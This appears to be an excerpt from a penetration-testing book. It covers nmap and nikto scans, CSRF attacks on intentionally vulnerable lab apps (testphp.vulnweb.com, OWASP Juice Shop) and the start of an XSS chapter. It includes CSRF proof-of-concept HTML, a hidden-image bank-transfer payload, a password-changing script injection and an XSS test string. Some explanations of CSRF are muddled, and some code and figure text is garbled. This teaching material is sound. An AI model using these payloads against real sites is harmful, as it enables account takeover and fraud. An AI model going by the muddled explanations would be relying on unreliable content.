Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice

For web application analysis, we already have tools like wpscan, httrack, and sqlmap in Kali Linux. However, we may need to scan the ports, so nmap will be extremely useful. That is also available in Kali Linux. Another good web application vulnerability scanner is nikto.

However, the range of nmap is quite big, and you can not only do the web application analysis but also use it for vulnerabilities analysis, information gathering, etc.

Let us see how we can find nmap or nikto in Kali Linux (Figure 2-17). In addition, we will do a port scan on the web application https://sanjib.site.



Figure 2-17. Finding "nmap" and "nikto" in Kali Linux

If we scan https://sanjib.site using nmap, we issue the following command and get this output:

//code 1.3

root@kali:~# nmap -v -A sanjib.site Starting Nmap 7.70 (https://nmap.org) at 2019-06-06 02:14 EDT NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 02:14 Completed NSE at 02:14, 0.00s elapsed Initiating NSE at 02:14 Completed NSE at 02:14, 0.00s elapsed Initiating Ping Scan at 02:14 Scanning sanjib.site (192.185.129.64) [4 ports] Completed Ping Scan at 02:14, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:14

```
Completed Parallel DNS resolution of 1 host. at 02:14,
0.36s elapsed
Initiating SYN Stealth Scan at 02:14
Scanning sanjib.site (192.185.129.64) [1000 ports]
Discovered open port 53/tcp on 192.185.129.64
Discovered open port 143/tcp on 192.185.129.64
Discovered open port 587/tcp on 192.185.129.64
Discovered open port 80/tcp on 192.185.129.64
Discovered open port 443/tcp on 192.185.129.64
Discovered open port 25/tcp on 192.185.129.64
Discovered open port 110/tcp on 192.185.129.64
Discovered open port 22/tcp on 192.185.129.64
Discovered open port 995/tcp on 192.185.129.64
Discovered open port 993/tcp on 192.185.129.64
Discovered open port 21/tcp on 192.185.129.64
Discovered open port 3306/tcp on 192.185.129.64
Discovered open port 465/tcp on 192.185.129.64
Discovered open port 8008/tcp on 192.185.129.64
Completed SYN Stealth Scan at 02:15, 22.34s elapsed
(1000 total ports)
Initiating Service scan at 02:15
Scanning 14 services on sanjib.site (192.185.129.64)
Completed Service scan at 02:15, 27.57s elapsed
(14 services on 1 host)
Initiating OS detection (try #1) against sanjib.site
(192.185.129.64)
Retrying OS detection (try #2) against sanjib.site
(192.185.129.64)
Initiating Traceroute at 02:15
```

Completed Traceroute at 02:15, 0.02s elapsed Initiating Parallel DNS resolution of 2 hosts. at 02:15 Completed Parallel DNS resolution of 2 hosts. at 02:15, 0.01s elapsed NSE: Script scanning 192.185.129.64.

We find that in my web application, several ports are left open. It is because I have used Wordpress in a separate directory. We could have used wpscan to specifically scan that directory and find more vulnerability. Usually, open ports are used by applications and services; therefore, they may have vulnerabilities and bugs inside them. The more applications and services use open ports to communicate internally, the more risks are involved.

These findings are very important for further scanning and capturing more traffic from the subdomains using Burp Suite or OWASP ZAP.

As a penetration tester or a bug bounty hunter, you need to know the usages of these tools also, so that you can use the result to analyze the traffic and make a detailed report based on your findings.

Besides nmap, nikto, or wpscan, you can use these tools, which are specifically meant for CMS scanning.

Zoom is a powerful Wordpress username enumerator with infinite scanning capability. Another good CMS scanner is cms-explorer; it reveals the specific modules, plugins, components, and themes. For Joomla vulnerabilities scanning, joomscan is good.

As we progress, we will see what type of tools we need. The usage of security tools to find vulnerabilities depends on many things. As per our requirements, we will use them.

Now our virtual lab is ready for hunting bugs and vulnerabilities in the web application. As we progress, we will check whether we can use any other tool that is not available in Kali Linux.

CHAPTER 3

How to Inject Request Forgery

In this chapter, we will look into every aspect of Cross-site Request Forgery (CSRF), as it is regarded as one of the top ten security vulnerabilities in any web application. CSRF is a very common attack; it tricks the victim into submitting a malicious request; after that, the attacker inherits all the identity and privileges of the victim, allowing the attacker to perform illegal actions on the victim's behalf.

In this chapter, we will not only learn about CSRF, but also we will test a few types of CSRF attacks on some intentionally vulnerable web applications to check for CSRF defenses.

What Is Cross-Site Request Forgery?

In CSRF, an attacker tricks the browser into doing some unwanted action in a web application to which a user is logged in. Therefore, the user is also tricked because they do not know what is happening behind the curtain. They log into their bank account and get a session ticket. The attacker uses the same session ticket and transfers the funds into his account. The browser and the user both do not know how it happens. While the money is being transferred into the attacker's account, the browser believes it is perfectly legal because the browser, as a security guard, checks the user's

session cookie and clears it. It is not supposed to know that someone else is riding the same session and entering the bank to transfer money into his account.

For this reason, CSRF is also known as "session riding" or "sea surfing." Figure 3-1 shows how it takes place in the real world.



Figure 3-1. How CSRF takes place in the real world

CSRF is typically conducted by using malicious social engineering; the hacker had sent an e-mail or a link to the victim well before. It is impossible for general users to guess that an e-mail has a malicious link that might send a forged request to a bank site. At the same time, the unsuspecting user is authenticated by the bank site, so it is impossible for the bank site to separate a legitimate request from a forged one. We need to understand another important aspect of HTTP protocol here. HTTP by default is stateless and it renders a stateless HTML page. However, we need some functionality that helps us to change the state when we send an e-mail or transfer money. We remain logged in for awhile. Therefore CSRF attacks target those functionalities that cause a state change on the server. The state change involves actions, such as changing the victim's e-mail address, password, or purchasing something on the victim's behalf.

CSRF is mentioned in the OWASP top–10 risks that applications site at present; you can check it just by typing "top ten security risks in web applications" on Google. Any security testing of a web application is considered to be incomplete without checking for CSRF defenses.

Mission Critical Injection of CSRF

We have learned enough theory. Let us try a live CSRF attack. As a penetration tester, you need to find vulnerabilities in the client's web application. Here we are testing an intentionally vulnerable web application http://testphp.vulnweb.com. When you open this web application you will get a warning at the end of the page:

Warning: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your web site. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Crosssite Request Forgery (CSRF), and more.

Open your Burp Suite community edition and turn the intercept off. Open http://testphp.vulnweb.com and you will find a text box and a submit button. You can type "hello" on it and press the button. It uses a

form and uses the HTTP method POST. You can either check the HTML by clicking "view source" or you can use OWASP ZAP response to see the code (we will also use ZAP after Burp).

Now turn Burp's intercept on and let the traffic flow through Burp (Figure 3-2).



Figure 3-2. We have typed "hello" in http://testphp.vulnweb.com and get the raw response in Burp).

The Burp Suite produces this raw response for us:

//code 3.1

```
POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
```

```
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testphp.vulnweb.com/search.php?test=query
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
searchFor=helo&goButton=go
```

```
Let us close the Burp Suite and <a href="http://testphp.vulnweb.com">http://testphp.vulnweb.com</a> for the
```

time being and open OWASP ZAP in our virtual Kali Linux. We launch the browser through ZAP and go to http://testphp.

vulnweb.com again. This time we type the same "hello" again. Here we have the raw response:

//code 3.2

```
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://testphp.vulnweb.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: testphp.vulnweb.com
```

```
searchFor=helo&goButton=go
```

That's more or less the same response we have received with two different tools. By showing the same response, I wanted to prove one thing: what you can do with Burp Suite, you can also do with OWASP ZAP. The only difference is, in the Burp Community edition in some cases like automated testing, the options are limited. People often buy the professional edition. What I want to emphasize is don't spend your money, or at least spend it judiciously, because you can do the same things using OWASP ZAP. At least in my long career, whenever I got stuck with Burp, I always solved it with ZAP.

Now we are going to attack http://testphp.vulnweb.com. We will first write HTML code that will post on that web application from a local file.

This file will use a JavaScript state change request inside the HTML form code. Once this HTML page is opened, it shows a "Submit Request" button.

Since we are going to create a proof of concept (PoC), we would click on this button. As a penetration tester or bug bounty hunter, you always have to write the PoC at the end of your findings of vulnerabilities. Be precise in describing what you have done, what you have found, in which way the application is vulnerable, etc. This PoC will play an important role in your entire career; therefore, I encourage you to read other PoCs written by other professionals.

Instead of a button, an attacker will place some fancy or attractive link. A normal user does not know that clicking on such links or button or image might bring trouble for them. The attacker will always try to make such things look normal and authentic.

Let us first see the code:

```
//code 3.3
```

```
<html>
<body>
<script>history.pushState(", ", '/')</script>
<form action="http://testphp.vulnweb.com/search.php?test=query"
method="post">
```

<input type="hidden" name="searchFor" value="CSRF">

The JavaScript code uses the browser's history and pushes the state change request. As you see in the preceding code (code 3.3), we are going to send a value "CSRF" instead of the last value "hello."

We have saved this HTML code as csrf.html and, keeping the Burp Suite intercept "on," we open this HTML file on the Firefox browser. Once it is opened, it shows the "Submit Request" button. Click it. The image in Figure 3-3 will show you that the attack is successful.

In the web browser, we can see that the web page of http:// testphp.vulnweb.com shows the value "CSRF" instead of "hello"; we have successfully changed the value of the web page. It proves that our JavaScript attacking script has worked properly. We have successfully changed the state of the page.



Figure 3-3. The CSRF attack is successful in http://testphp.vulnweb.com

As a penetration tester or security professional, you should have a working knowledge of HTML, JavaScript, and Python. It helps you a lot. I strongly recommend it.

Note Knowing these languages, I am able to run this example using the Burp Suite Community edition. The Burp professional version allows you to generate this code automatically; but, you will never learn these languages if, from the beginning, you start depending on the tool.

In Figure 3-3, you clearly see that we have successfully attacked http://testphp.vulnweb.com and submitted a value that is posted on the web application. This shows that the CSRF defenses of http://testphp.vulnweb.com are vulnerable.

We can check the raw response in the Burp Suite.

//code 3.4

```
POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
DNT: 1
Connection: close
```

```
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
searchFor=CSRF&goButton=go
```

Other CSRF Attacks

You have just seen how we have done a CSRF attack and presented the PoC. There are several other techniques that are frequently used by hackers. One of the most popular of them is a URL link like this:

```
<a href="http://anybanksite.com/transfer.do?acct=John&
amount=100000">You have won a Lottery!</a>
```

Or as a 0 by 0 fake image, like this:

```
<img src="http://anybanksite.com/transfer.do?acct=John&
amount=100000" width="0" height="0" border="0">
```

The advantage of such a 0 by 0 image is that it remains in an HTML page as an invisible ghost. When you open up this e-mail, you don't see the image but the browser will still submit the request to anybanksite.com.

The only difference between GET and POST attacks is how the attack is being executed by the victim. Let's assume the bank now uses POST, as we have seen in the just concluded CSRF PoC. This form will require the user to click on the submit button. However, this also can be executed automatically using a JavaScript code snippet like this:

```
<body onload="document.forms[0].submit()">
```

We will see the implementation of such code shortly, in the next section.

How to Discover CSRF on Any Application

As a penetration tester or bug bounty hunter, you will be asked by your client to test the web application to check the CSRF defenses. Is this application vulnerable? Posing as an attacker, you need to find out all the flaws. Can we intercept the password? Can we manually inject JavaScript code into it and change the state?

We have already seen two intentionally vulnerable web applications so far: WebGoat and http://testphp.vulnweb.com. We are going to run our tests on another intentionally vulnerable web application: OWASP Juice Shop. The OWASP Foundation has created this unique ecommerce application. Installing Juice Shop is extremely easy. Go to their GitHub repository: https://github.com/bkimminich/juice-shop. Go to the setup section and you can set up your local Juice Shop using many options available. However, I am telling you the best one.

Open your VirtualBox Kali Linux and download the latest zipped application folder. Unpack the zipped content in your Download directory. After that, use the following code:

//code 3.5

```
root@kali:~/Downloads# cd juice-shop_8.7.2/
root@kali:~/Downloads/juice-shop_8.7.2# npm start
> juice-shop@8.7.2 start /root/Downloads/juice-shop_8.7.2
> node app
info: All dependencies in ./package.json are satisfied (OK)
info: Detected Node.js version v10.16.0 (OK)
info: Detected OS linux (OK)
info: Detected OS linux (OK)
info: Detected CPU x64 (OK)
info: Required file index.html is present (OK)
info: Required file main.js is present (OK)
```

```
info: Required file polyfills.js is present (OK)
info: Required file runtime.js is present (OK)
info: Required file vendor.js is present (OK)
info: Configuration default validated (OK)
info: Port 3000 is available (OK)
info: Server listening on port 3000
```

Now, your Juice Shop application is running on http://localhost:3000 (Figure 3-4).



Figure 3-4. OWASP Juice Shop is running locally.

Next we will open our Burp Suite. Keep intercept off. Juice Shop provides a registration facility for new users. I have made an account using these credentials:

Email: foo@bar.com Password: P@ssword

It will ask a security question. There are many choices. I have chosen the question: what is your first company? My answer was: '**MyCompany**'.

In the next step, I am going to add the username Sanjib in the profile section. After that, I will change the password in Juice Shop. Will Burp Suite intercept that? Let us try. I have already checked that the traffic to Juice Shop has been processed through Burp Suite.

I have changed the current password P@ssword to password123. In Juice Shop it has successfully been changed. At the same time in Burp Suite I got this response:

//code 3.6

GET /rest/user/change-password?current=P@ssword&new=password123 &repeat=password123 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: application/json, text/plain, */* Accept-Language: en-US, en; q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:3000/ Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ zdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MTUsInVzZXJuYW1lIjoiI iwiZW1haWwiOiJmb29AYmFyLmNvbSIsInBhc3N3b3JkIjoiMzgyZTAzNjBlNGV iN2I3MDAzNGZiYWE2OWJlYzU3ODYiLCJpcOFkbWluIjpmYWxzZSwibGFzdExvZ 2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiZGVmYXVsdC5zdmciLCJ ob3RwU2VjcmVOIjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWFOZWRBdCI6IjIwM TktMDYtMjAgMDE6MDk6NDMuMjcwICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMTk tMDYtMjAgMDE6MDk6NDMuMjcwICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbHosI mlhdCI6MTU2MDk5MzAwMCwiZXhwIjoxNTYxMDExMDAwfQ.JZYZzCAgPEkbGA9a RIKKKrMue9lnZBkNkyXbP86TXn40sT6k3yP-6kVejmGvyM5UNBd0iXpT0mkaG9 tZefEoIqsm7D7tb6gxvJcdP2s6RrS0BSTH2w32WZ46xaFt4EVCFGqMYUe0VkbL-U1UtVJUaf-IVm66lzk29njHtz4Lo g

Cookie: language=en; io=Unq26SseBmTY8sRrAAAC; welcome-bannerstatus=dismiss; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ zdGFOdXMiOiJzdWNjZXNzIiwiZGFOYSI6eyJpZCI6MTUsInVzZXJuYW1IIjoiI iwiZW1haWwiOiJmb29AYmFyLmNvbSIsInBhc3N3b3JkIjoiMzgyZTAzNjBlNGV iN2I3MDAzNGZiYWE2OWJ1YzU3ODYiLCJpcOFkbWluIjpmYWxzZSwibGFzdExvZ 2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiZGVmYXVsdC5zdmciLCJ Ob3RwU2VjcmVOIjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWFOZWRBdCI6IjIwM TktMDYtMjAgMDE6MDk6NDMuMjcwICswMDowMCIsInVwZGFOZWRBdCI6IjIwMTk tMDYtMjAgMDE6MDk6NDMuMjcwICswMDowMCIsImRlbGVOZWRBdCI6IjIwMTk tMDYtMjAgMDE6MDk6NDMuMjcwICswMDowMCIsImRlbGVOZWRBdCI6bnVsbHosI mlhdCI6MTU2MDk5MzAwMCwiZXhwIjoxNTYxMDExMDAwfQ.JZYZzCAgPEkbGA9a RIKKKrMue9lnZBkNkyXbP86TXn40sT6k3yP-6kVejmGvyM5UNBdOiXpTOmkaG9 tZefEoIqsm7D7tb6gxvJcdP2s6RrSOBSTH2w32WZ46xaFt4EVCFGqMYUeOVkbL-U1UtVJUaf-IVm66lzk29njHtz4Lo_g; cookieconsent_status=dismiss; continueCode=6DyMwXx1mzZRy9EWqoBKPLew2Or6dwo1d4b15M3aQvYVkgnpj 87XNDJKPVJL

DNT: 1

Connection: close

Therefore, we have successfully attacked and established that this web application has vulnerabilities; its CSRF defenses are weak (Figure 3-5).

Watch the first section of the header part that is reflected on Burp Suite.

```
GET /rest/user/change-password?current=P@ssword&new=password123
&repeat=password123 HTTP/1.1
```

It means, without any difficulties, Burp Suite captured the traffic. If the CSRF defense was strong enough in Juice Shop, Burp Suite could not have captured that easily. Here the output is the clear indication of weakness. Any strong application would not have allowed capturing that data.



Figure 3-5. Testing the CSRF defenses of Juice Shop web application

In Burp Suite there is an option called Repeater. Using this section, we can try to manipulate any web application and test whether the current password is correct or not. Since it plays back the requests to the server, this tool is called Repeater. We can always manually modify any HTTP request and play the request back to the server to test the responses. We do this to find vulnerabilities.

Just use the second mouse click on Burp Suite response; it will show many options. Choose the Repeater and click (Figure 3-6).



Figure 3-6. Using Repeater in Burp Suite

On the left side panel, you can change the current password parameter to pass and click the Go button. You can change it on the top panel of the header section in the Raw tab. After changing the current password to a new password, when we click the Go button, it plays back the request to the server. We have manually modified the HTTP request and tried to force the server to obey our order.

On the right side, it gives you an output like this:

```
//code 3.7
```

HTTP/1.1 401 Unauthorized X-Powered-By: Express Access-Control-Allow-Origin: * X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Type: text/html; charset=utf-8 Content-Length: 32

```
ETag: W/"20-6tKKLCLLgOnzR5qInvJyo/E13vg"
Vary: Accept-Encoding
Date: Thu, 20 Jun 2019 01:28:22 GMT
Connection: close
```

```
Current password is not correct.
```

It says the current password is not correct. It is quite obvious, when we logged in, that we changed the password; now we are going to change the password to pass1234. We are going to do the same thing through the Burp Suite Repeater tool. However, this time we will use the correct password.

Now, using the Repeater feature of Burp Suite, we can also change the newly changed password.

On the left panel, change the new password to pass1234 and click the Go button above.

On the right side we have got this response:

//code 3.8

HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Type: application/json; charset=utf-8 Content-Length: 302 ETag: W/"12e-UIOHnPP2ynY8xMCFiTvRctgcM9A" Vary: Accept-Encoding Date: Thu, 20 Jun 2019 01:34:56 GMT Connection: close

{"user":{"id":15,"username":"Sanjib","email":"foo@bar.com",
"password":"32250170a0dca92d53ec9624f336ca24","isAdmin":false,"
lastLoginIp":"0.0.0.0","profileImage":"default.svg","totpSecret
":"","isActive":true,"createdAt":"2019-06-20T01:09:43.270Z",
"updatedAt":"2019-06-20T01:34:56.417Z","deletedAt":null}}

As you see in the preceding code, the HTTP status is 200 OK. So it has worked. We have successfully changed the password of the current user while the user is logged in. Once the user is logged out, we can log in with the new password.

Immediately, on the Juice Shop application, our successful attempt to break the CSRF defenses has been reflected. It announces "You successfully solved a challenge: Privacy Policy Tier 1 (Read our privacy policy.)" (Figure 3-7).

Applications - Places - O Fire	efox ESR 👻 We	ed 21:36	1	# / ··· · ·
	OWASP Juice S	šhop - Mozilla Firefox		000
∠ OWASP Juice Shop × +				
← → C ŵ is localho	st:3000/#/login	··· 🖸 🏠 🕅 🕅		⊛ ⊜ ≡
🌣 Most Visited 🥆 Kali Training 🥆 K	ali Tools 👖 MSFu 🔅 Most Visited 🔞 Getting S	Started 🛅 Fedora Project 🛅 Red Hat	E Free Content	ogle Chrome >>
0WASP Juice Shop	+) Login	Search		: Us 🔘 GitHub
You successfully solved a chai	lenge: Privacy Policy Tier 1 (Read our privacy p	olicy.)		×
	Covali foo@bar.com			
	Log in G Log in w	e th Google		

Figure 3-7. Successfully solved a problem in Juice Shop by changing the password

Now, we can also inject JavaScript code into the Juice Shop application. If the code changes the password, our mission will be successful.

```
//code 3.9
<script>
xmlhttp = XMLHttpRequest;
xmlhttp.open('Get', 'http://localhost:3000/rest/user/change-
password?new=pass12345&repeat=pass12345');
xmlhttp.send();
</script>
```

We can paste this code into the search text box and hit the button. Immediately, in the terminal a message is popped up (Figure 3-8):

info: Solved challenge Privacy Policy Tier 1 (Read our privacy
policy.)



Figure 3-8. A CSRF attack on Juice Shop is successful.

In this chapter, we have learned many features of CSRF attacks. But our journey has just begun; the form of attacks is continually changing. Therefore, get involved with the open source resources available on the Internet (OWASP is a very good place). It takes time to get adjusted with all the challenges. In the coming chapter, we will learn about another major challenge: how to defend against Cross-site Scripting (XSS).

CHAPTER 4

How to Exploit Through Cross-Site Scripting (XSS)

Resisting Cross-site Scripting (XSS) is one of the most daunting tasks; web applications usually have many types of vulnerabilities that trigger XSS attacks. It is one of the most common attacks, and it is always featured in the top ten IT security risks.

The bigger the web application, the harder is the task to resist XSS. An attacker sends malicious code in the form of a browser side script, and for that reason it is compulsory to sanitize all the user input fields. In a big web application, such as Google or Facebook, this task is really difficult. Hundreds and thousands of coders work together; someone might have missed stripping the tags. An attacker always tries to find vulnerabilities, trying to search where HTML tags work. If it works, the attacker will inject malicious JavaScript code, through the input fields, into the server. There are several other techniques involved.

As a penetration tester, your job is to find whether your client's web application is vulnerable or not. If there are vulnerabilities, you must detect them and point out the remedy.

In this chapter, we will look into all aspects of XSS.

What Is XSS?

Let us start this section with a diagram (Figure 4-1).



Figure 4-1. How Cross-site Scripting or XSS takes place

In Figure 4-1 we see that there are two interfaces: one is the user's interface and the other is the hacker's interface. The user clicks a link that contains malicious JavaScript code. How did the user get this link? Either it had been sent in an e-mail by the hacker or the attacker had posted it in a public forum; the link had been disguised as "Read More" or something like that. Once the user clicks the link, they become a victim. Figure 4-2 showcases this scenario in detail.

CHAPTER 4 HOW TO EXPLOIT THROUGH CROSS-SITE SCRIPTING (XSS)



Figure 4-2. How an attacker has full access to the user's account

The JavaScript code works on the browser. So it targets a particular user who has clicked the link. Clicking the link enables the user's browser to implement the malicious JavaScript code on it, which in turn takes out the user's session cookie. Once the attacker gets the user's session cookie, the mission is successful. Using the same session cookie, the attacker transfers the user's money. Therefore, Figure 4-2 represents **reflected cross-site scripting**. The malicious code is stored in a link to be clicked, rather than as part of a web site itself.

Stored or persistent cross-site scripting is a little bit different. It generally takes place when user input is stored on the target server, such as in a database. That data is in the form of malicious code that is rendered on the browser without being made safe. For example, the attacking code is stored in posts by the attacker in a forum. As other visitors visit the forum they become the victims of XSS attack, because the code is executed every time the forum post is viewed in a browser.

In the next section, we will see how we can discover any XSS attack.

Discovering XSS Vulnerabilities

Discovering any XSS attack in a web application has been made easy through Burp Suite. We can easily discover whether a web application has vulnerabilities or not. We can also discover whether it has already been attacked by someone or not just by attacking it using Burp Suite.

To do this test, we will install OWASP Broken Web Application or owaspbwa. It is a collection of many intentionally vulnerable web applications that consists of WebGoat, DVWA, Mutillidae, and many more. We have seen and tested some of them. However, we can get all of them in one place. Although it has not been updated for a while, there is no alternative where you have many intentionally vulnerable applications under one roof. Of course, you can install each one individually and install the recent version; however, that would take time. In fact, in my opinion, that is not important. These are all playgrounds where you can examine a concept and try to understand the repercussions. Therefore, you can install it and examine different types of security bugs.

The installation part is not difficult. Download and install it on your VirtualBox so that whenever you want to test your hacking skill you can practice on it locally (Figure 4-3).

First, download the OWASP Broken Apps VMDK files. All five files will be downloaded but it will take some time, as it is around 4 GB.

Next, open your VirtualBox and just install it like any Linux operating system. Memory size 512 MB is perfectly fine. While you are choosing the path, point it out to the VMDK file and it will get installed. In the network section, choose the bridge adapter so that, keeping your Internet connection on, you can connect it to your Burp Suite or OWASP ZAP.

Usually, the URL varies between 192.168.2.2 and 192.168.2.3; it will be shown when you start it in your virtual lab. Log in is root and the password is owaspbwa.

CHAPTER 4 HOW TO EXPLOIT THROUGH CROSS-SITE SCRIPTING (XSS)



Figure 4-3. The collection of many intentionally vulnerable web applications owaspbwa

Locally, it is running on http://192.168.2.3:3000; before launching this application, we need to keep our Burp Suit's intercept in "off" mode to let the traffic pass through Burp.

As I have said, there are many applications inside it; I have chosen the bWAPP application (Figure 4-4).

CHAPTER 4 HOW TO EXPLOIT THROUGH CROSS-SITE SCRIPTING (XSS)



Figure 4-4. The bWAPP application

We will create a new user here. We would like to see the reflected traffic on our Burp Suite. In the Burp we have got this output:

```
//code 4.1
POST /bWAPP/user_new.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/bWAPP/user_new.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
```

```
CHAPTER 4 HOW TO EXPLOIT THROUGH CROSS-SITE SCRIPTING (XSS)
```

```
Cookie: PHPSESSID=q9llh7kbrha95q8gr4b850mjo3; acopendivids=swin
gset,jotto,phpbb2,redmine; acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
login=foo&email=foo%40bar.com&password=foo1234&password_conf=fo
o1234&secret=my+secret&action=create
```

We can clearly see that the new user's e-mail is foo@bar.com; the password is foo1234; and the answer to the secret question is "my secret" (Figure 4-5).



Figure 4-5. The output in the Burp Suite

We can exploit this user-name and password in the future, but before that, we will test whether this bWAPP application has vulnerabilities or not.
We can try to inject some JavaScript code inside the user-name input filed. Let us see the result.

//code 4.2

<script>alert("Hello, this is reflected XSS");</script>

We have injected this code into the input field (Figure 4-6).



Figure 4-6. JavaScript code inside the input field

We have found that it is working perfectly. Here is the output on the browser (Figure 4-7).



Figure 4-7. The JavaScript code has been injected successfully.

In the response section of Burp Suite, we have received this message:

//code 4.3

GET /bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%28%22Hello%2
C+this+is+reflected+xss%22%29&lastname=%3C%2Fscript%3E&form=
submit HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/bWAPP/xss_get.php?firstname=%3C
script%3Ealert%28%22Hello%2C+this+is+reflected+xss%22%29%29&
lastname=%3C%2Fscript%3E&form=submit

```
Cookie: PHPSESSID=uppr7dk5kgu1he5utku9fcetk5; acopendivids=
swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada;
security_level=0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

Next, we will test another web application called Vicnum; here you can guess a number and play a game. We have selected the Guessnum project (Figure 4-8).

Applications - Places	 Firefox ESR - 	Sun 01	12						1	12	1	11) (J	-
		Let's Play Guessnum	- Mozilla Firefox								c	•	0
Let's Play Guessnum	× +												
$(\leftrightarrow \rightarrow \times)$	🛈 🔏 192.168.2.3/vicnum/cgi-b	in/guessnum1.pl	🛡	☆	lif\		0 (N	٢		•		Ø	Ξ
🌣 Most Visited 🥆 Kali T	raining 🥆 Kali Tools 🚺 MSFu 💰	🗘 Most Visited 🔞 Getting Starte	d 🛅 Fedora Proj	ect B	Red Hat	E Fre	e Conte	nt 🛅	From G	ogle Cr	nrome		»
Cuesanum													
GUESSNUN	บ												
and and a second se	and the second s												_
Welcome - th	e computer has c	hosen a number											
Enter your fu	rst quess and the	n click on the Gu	ess hutte	m									
Enter your in	or guess and the	i chen on the ou	icos bucc										
*> GUESS	Clear												
													-
please visit the OWAS	he vicnum project which was SP project page.	s developed for educational	purposes to de	mon	strate co	mmor	web	uiner	abilitie	s. For	comn	ients	
Mordecai Kraushar													
	0												
• GIPHENIEGH	9												
Waiting for 192.168.2.3													

Figure 4-8. The Guessnum project inside the Vicnum application

In our Burp Suite we have included this web application into the "Intruder" section and loaded a bunch of JavaScript code. You can get plenty of JavaScript code in the seclist GitHub repository. Just search inside GitHub and download the zipped folder.

https://github.com/danielmiessler/SecLists,

Here you can have a collection of multiple types of lists that are used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Note As a security person or penetration tester, you will have to constantly search and research all the current open source projects. The "seclist" or "Security List" is a good resource. Kali Linux also comes up with its own word lists; we will see that in the next section.

Let us start an attack and click "show response in browser"; it will give us a URL (Figure 4-9).



Figure 4-9. Show response in browser

We are going to paste this URL on the browser and see whether that opens up the attacked application or not. If it opens up, it will be a proof of concept that this web application has plenty of vulnerabilities; and an attacker can benefit from it. Sometimes, if username-password combinations mismatch or the JavaScript code does not work, the browser may not open the page. Don't get frustrated; it's a trial and error method, and you need to try different types of files downloaded from the GitHub seclists resource. My efforts have not yielded any result in the first attempt!

I want to emphasize one thing: patience is the key if you want to become a successful penetration tester or bug bounty hunter. Most of our jobs are based on this trial and error method.

At the same time, we will scan the same application with OWASP ZAP. ZAP's scanner is extremely good and it will give us three types of alerts: high, medium, and low. These alerts are marked by three colored flags. Red flag means high, orange flag stands for medium, and low is flanked by a yellow flag. We have got seven high alerts in this web application (Figure 4-10).

Sun 05:32	1 🕺 🖌 🗐 🖯 🛨
Untitled Session - 20190623-050733 - OWASP ZAP 2.8.0	000
⊇= □□□□ ♣ # / ● ▷ ▷ Ø ¥ = 1 = ● ♥ ● €	
🐓 Quick Start 🖙 Request Response 🐖 🛨	
Header: Text 💌 Body: Text 💌 🔲 🛄	
